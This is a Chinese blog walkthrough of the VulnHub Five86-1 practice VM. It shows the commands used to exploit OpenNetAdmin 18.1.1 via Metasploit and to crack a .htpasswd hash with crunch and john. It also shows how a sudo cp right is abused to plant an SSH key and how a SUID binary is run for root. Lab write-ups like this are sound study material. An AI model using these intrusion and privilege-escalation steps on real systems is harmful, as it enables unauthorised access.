VulnHub Five86-1 靶机渗透

最新推荐文章于 2024-08-05 11:24:26 发布
最新推荐文章于 2024-08-05 11:24:26 发布
阅读量376 收藏
点赞数
分类专栏: VulnHub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34935231/article/details/115552192
版权

Five86-1 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-04-09

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0 

主机ip为172.16.1.24

nmap  -p- -A -T5 172.16.1.24

开启了80与22端口,看到nmap上面扫描到robots.txt

dirb http://172.16.1.24:80

查看robots.txt

尝试访问/ona

靶机opennetadmin版本为18.1.1,经查询该版本存在漏洞

二、web渗透

开启msf进行渗透

msfconsole

search opennetadmin

use 0

set rhost 172.16.1.24

set lhost 172.16.1.4

show options

run

成功获得低权shell

三、提权

切换交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

查看home目录,发现有5个用户

查看web目录,找到.htpasswd

ls -lsa

cat .htpasswd

我们可看到douglas用户的密码为$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

需要进行解密,秘钥为10个字符,aefhrt6个字母排列组合

我们生成字典表

crunch 10 10 aefhrt >password.txt

保存加密密码$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1为hash

进行解密

john --wordlist=password.txt hash

解密出来密码为fatherrrrr

切换用户

su douglas

fatherrrrr

成功登录douglas

查看sudo权限

sudo -l

jen用户cp命令有

生成ssh秘钥

ssh-keygen -b 2048

直接回车就可以

替换认证秘钥

cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

cd /tmp

chmod +x  authorized_keys

sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

本地连接jen

ssh jen@127.0.0.1

成功登录jen,提示我们查看mail

cd /var/mail

ls

cat jen

他说moss密码改为Fire!Fire!

切换moss用户

尝试suid提权

find /home -type f -perm -u=s 2>/dev/null

提示/home/moss/.games/upyourgame有权限

./upyourgame

哈哈,提权成功

四、总结

本地靶机考察了对密码的破解

Vulnhub靶机Five86-2渗透笔记
liver100day的博客
09-11 656
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 目录爆破3.漏洞利用3.1 查找有关WordPress 5.1.4版本的漏洞3.2 WPscan 破解账户密码3.3 反弹shell第一步:生成一句话木马文件第二步:压缩一句话木马文件第三步:上传压缩文件并获取shell4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机Five86-2 IP地址未知 靶机下载地址:http://www.
vulnhub靶机Five86-1渗透笔记
liver100day的博客
09-07 1478
文章目录1.环境搭建2.主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sick0s1.1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 2.主机发现 3.漏洞利用 4.提权 5.总结 ...
渗透测试靶机vulnhub_five86:1
weixin_46128614的博客
03-31 410
靶机下载地址:five86:1 首先扫描端口 nmap 192.168.49.137 -sS -sV -p- -T5 -A 发现只开了80端口访问 发现一个cms opennetadmin 搜索该cms是否有直接可利用的exp,果然存在 反弹回一个webshell 搜集linux系统信息,检查一下内核版本,没有内核提权漏洞 在后台配置文件找到数据库密码 用one_password 爆...
vulnhubFive86-1
底层社会中的弱智
02-04 820
针对目标机器,先扫描找出靶机然后再扫端口查看服务 Nmap -Pn ip网段 是用nmap -A -p- -T4 192.168.127.130 查看详细的端口服务 上图可以得知: 22端口SSH服务开启(攻击方法有 针对第三方SSH软件版本漏洞的攻击 暴力破解 匿名登录 弱口令) 80端口是HTTP服务(网站的十大常规漏洞 第三方框架WORDPRESS之类 apache解析漏...
Five86-1 渗透测试
Darklord.W
07-26 434
一、信息收集 扫描目标主机机器开放端口 ​ nmap扫描开放端口详细服务 ​ 扫描两个端口下的web目录,80端口有内容,10000端口下没有其他目录出现 ​ 访问web目录,首先是80端口下的目录 /reports目录需要用户名密码验证 ​ robots.txt目录下 ​ 访问/ona目录,发现是一个web系统,浏览相关信息得到80端口index页面可能需要添加一条解析记录才可以访问 ​ 尝试添加记录并访问 ​ 结果还是不行 ​ 但是的话,可以...
Vulnhub靶机Five86-1详细解析
蚁景网安学院
01-15 503
喜欢就关注我吧,订阅更多最新消息文章字数1539 预计阅读时长7分钟 涉及知识点实操练习-VulnHub渗透测试实战靶场Node 1.0https://www.hetianlab.c...
five86-1靶机渗透攻略
weixin_47311099的博客
01-11 1547
five86-1攻略 下载地址https://www.five86.com/five86-1.html 主机发现 nmap -sP 192.168.8.0/24 目标IP地址为 192.168.8.141 端口扫描 nmap -A 192.168.8.141 -p- 发现22ssh、80http、10000Webmin(基于web的unix管理工具) 访问80端口 空白页面 后台扫描 dirb http://192.168.8.141 robots文件里发现一个/ona目录,访问后得到 o
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
DC-6靶机渗透测试
最新发布
m0_66225311的博客
08-05 636
又是一个远古靶机,最近又做了一做,发现可以直接用50110.py文件一把梭获取权限,不需要之前那么繁琐的用html文件来反弹shell了。第一次没能进行尝试,要不然就能搞点不一样的了
VulnhubFive86-2
4ut15m's blog
02-12 855
Description Five86-2 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to re...
vulnhub靶场,FIVE86-1
kukudeshuo的博客
09-07 358
vulnhub靶场,FIVE86-1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/five86-1,417/ 攻击机:kali(192.168.109.128) 靶机FIVE86-1192.168.109.175) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.175 使用nmap扫描查看目标靶机端口开放情
vulnhub-five86-1
qq_41810304的博客
02-22 455
下载地址:https://www.vulnhub.com/entry/five86-1,417/ 前言: 作为小白(参考我写过的其他文章前言,懒得再来一遍了) Kali:192.168.1.4 目标机:192.168.1.27 信息收集: 漏洞挖掘: 分别访问80和10000端口。80端口访问后,页面源码如下: 访问10000端口发现登录页面,确认该端口是一个cms网页,但...
vulnhub-five86-2
qq_41810304的博客
02-23 459
下载地址:https://www.vulnhub.com/entry/five86-2,418/ 前言: 作为小白(略),文中提到的工具仅供学习。 Kali:192.168.109.129 目标机:192.168.109.141 信息收集: 漏洞挖掘: 从扫描信息来看,只能访问80端口,ftp无法匿名登录。进入80端口后,发现是一个WordPress网站,使用wpscan扫描一下...
Vulnhub通关手册》—— 04 Five86-1
weixin_53801131的博客
12-30 678
Vulnhub通关手册——04 Five86-1 背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为100.10.10.133,将该IP地址添加到hosts文件中,映射到域名five86.local 技术要点: opennetadmin漏洞利用 find / -type f -user 用户名查看该用户名可以读取的文件 使用hash-identifier查看加密方式 使用crunch生成字典 使用hashcat工具进行密码破解
VulnhubFive86-1
4ut15m's blog
02-09 680
Description The ultimate goal of this challenge is to get root and to read the one and only flag. 信息搜集 nmap -sP 192.168.1.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:02 CST Nmap...
记一次vulnhub|渗透测试Five86-2
crispr的博客
01-29 1440
Five86-2 0X01 Main Point 1.wpscan的使用 2.tcpdump的抓包以及流量分析 3.wordpress插件提权 0X02 前期嗅探和端口探测 arp-scan -l得到靶机IP: nmap -sS -A -p- 172.20.10.3扫描靶机IP的端口开放情况: ftp无法匿名登录,只能从80端口入手: wordpress框架;显示不清楚; 在/et...
oscp——five86: 2
王嘟嘟的博客
01-19 854
0x00 前言 这个是练习的第9个机子。接着做five86: 2,实际上由于各种原因,我是在并行做两个机子。 0x01 实验 1.信息收集 1.1 ip 1.2 端口 2.攻击尝试 2.1 端口攻击尝试 21可以爆破,但是这里不优先进行爆破这个 2.2 web攻击尝试 打开访问之后(hosts绑定了的),发现是一个wp的站。之前做过,所以直接上wpscan 扫出来了几个用户 使用字典跑一下...
Five86-1 靶机实战
braty_的博客
04-16 513
标题发现:OpenNetAdmin :: 0wn Your Network 这是一款 网络管理器。直接ssh登录,这里是想办法登录更高权限的jen,我们这里发现了公钥,这里只能尝试爆破和sql注入均无果,,还是回到80端口尝试。发现脚本文件,查看是乱码,,我们直接运行即可提权为root。是有页面显示,告诉我们要 https 访问。的命令注入利用脚本,和RCE远程命令执行脚本。拿到shell,我们弹一个稳定的shell。告诉我们密码大概是10位数,字符均是。什么都没有,,看看君子协议。发现一封邮件,去看看。
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机Vulnhub提供的众多靶机之一,专门设计用于学习和练习渗透测试技术。 DC-1靶机描述中提到的渗透测试,是指一种旨在评估计算机系统安全性的方法,通过尝试攻击系统来找到安全弱点。渗透测试人员(俗称“白...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值